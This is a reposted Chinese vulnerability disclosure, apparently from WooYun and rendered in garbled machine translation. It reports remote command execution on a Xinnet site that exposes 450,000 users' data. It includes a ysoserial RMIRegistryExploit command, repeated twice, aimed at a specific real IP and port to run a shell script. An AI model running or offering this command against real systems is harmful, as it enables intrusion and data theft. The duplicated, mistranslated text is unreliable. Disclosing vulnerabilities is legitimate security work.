新网某站命令执行45万用户信息泄露
漏洞标题 新网某站命令执行45万用户信息泄露 相关厂商 北京新网互联科技有限公司 漏洞作者 小川 提交时间 2016-06-12 22:46 公开时间 2016-06-18 10:40 漏洞类型 系统…
漏洞标题
新的网站命令执行了450,000个用户信息泄漏
相关制造商
北京新旺互联网科技有限公司
漏洞作者
小川
提交时间
2016-06-12 22: 46
公共时间
2016-06-18 10: 40
漏洞类型
系统/服务补丁不及时
危险等级
高
自我评估等级
20
漏洞状态
该漏洞已通知供应商,但供应商忽略了该漏洞
标签标签
远程代码执行
漏洞详细信息
漏洞证明:
Java -cp ysoserial-0.0.4-all.jar ysoserial.exploit.RMIRegistryExploit 58.221.79.43 1099 CommonsCollections1'/tmp/my.sh'
修理计划:
我没有任何其他的ips,但它们都打开8090端口。对于一个系统,我会让它们离开。请把它们固定在一起。
版权声明:请注明出处。小川@乌云
漏洞证明:
Java -cp ysoserial-0.0.4-all.jar ysoserial.exploit.RMIRegistryExploit 58.221.79.43 1099 CommonsCollections1'/tmp/my.sh'
修理计划:
我没有任何其他的ips,但它们都打开8090端口。对于一个系统,我会让它们离开。请把它们固定在一起。
版权声明:请注明出处。小川@乌云
- 发表于 2016-07-17 08:00
- 阅读 ( 597 )
- 分类:黑客技术
